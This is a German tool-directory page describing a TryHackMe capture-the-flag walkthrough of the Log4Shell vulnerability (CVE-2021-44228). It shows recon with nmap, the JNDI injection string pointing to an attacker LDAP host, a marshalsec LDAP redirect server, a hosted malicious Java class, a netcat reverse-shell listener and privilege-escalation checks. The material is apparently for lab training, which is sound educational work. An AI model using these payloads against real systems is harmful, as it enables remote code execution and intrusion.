Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
solar-exploiting-log4j — Dieses Repository bietet eine detaillierte Anleitung zum *Solar Exploiting Log4j Raum* auf TryHackMe, mit Fokus auf die Ausnutzung der kritischen Log4Shell-Schwachstelle (CVE-2021-44228). Das Projekt demonstriert, wie Angreifer unsichere Protokollierungsmechanismen in Java-Anwendungen ausnutzen können, um Remote-Codeausführung zu erreichen. | Kitploit
Tools/GitHubGitHub/lavanya2085/solar-exploiting-log4j
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungLabs & Praxis
GitHublavanya2085/solar-exploiting-log4j

solar-exploiting-log4j

Repository anzeigen
13vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Dieses Repository bietet eine detaillierte Anleitung zum *Solar Exploiting Log4j Raum* auf TryHackMe, mit Fokus auf die Ausnutzung der kritischen Log4Shell-Schwachstelle (CVE-2021-44228). Das Projekt demonstriert, wie Angreifer unsichere Protokollierungsmechanismen in Java-Anwendungen ausnutzen können, um Remote-Codeausführung zu erreichen.

Teilen

🔥 Solar Exploiting Log4j – TryHackMe Komplettlösung

📌 Raum: Solar Exploiting Log4j

Plattform: TryHackMe
Schwierigkeit: Mittel
Thema: Log4Shell (Log4j-Sicherheitslücke)


🧠 Zielsetzung

Die Log4j-Sicherheitslücke (CVE-2021-44228) ausnutzen, um Remote-Codeausführung zu erlangen und Flags zu erbeuten.


🛠️ Verwendete Werkzeuge

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 Schritt 1: Aufklärung

🔍 Ziel scannen

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 Ergebnisse

  • Offene Ports: 80 (HTTP), andere je nach Raum
  • Webanwendung mit Java-basiertem Backend

🌐 Schritt 2: Web-Enumeration

  • Rufe die Webanwendung im Browser auf
  • Interagiere mit Eingabefeldern (Login/Suche/Header-Felder)
  • Erfasse die Anfrage mit Burp Suite

💥 Schritt 3: Log4j-Sicherheitslücke identifizieren

Die Log4j-Sicherheitslücke erlaubt JNDI-Injection:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

Wenn die Eingabe protokolliert wird → liegt eine Sicherheitslücke vor.


⚙️ Schritt 4: Listener einrichten

Netcat starten

root@kitploit:~
nc -lvnp 4444

Böswilligen LDAP-Server starten (Beispiel)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

LDAP-Server ausführen:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 Schritt 5: Payload hosten

root@kitploit:~
python3 -m http.server 8000

Erstelle bösartige Java-Klasse (Exploit.class)


🚀 Schritt 6: Exploit auslösen

Payload in anfälliges Feld injizieren:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 Verwende Header wie:

  • User-Agent
  • X-Api-Version

🖥️ Schritt 7: Reverse-Shell erhalten

Sobald ausgelöst:

  • Ziel verbindet sich zurück zum Netcat-Listener
  • Du erhältst Shell-Zugriff

🔐 Schritt 8: Rechteausweitung (falls erforderlich)

Prüfe:

root@kitploit:~
sudo -l

Suche nach:

  • Fehlkonfigurierte SUID-Binärdateien
  • Beschreibbare Dateien
  • Cron-Jobs

🚩 Schritt 9: Flags erbeuten

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 Gelernte Schlüsselkonzepte

  • Log4Shell (CVE-2021-44228)
  • JNDI-Injection
  • Remote Code Execution (RCE)
  • Reverse-Shell
  • Web-Exploitation
Tool herunterladen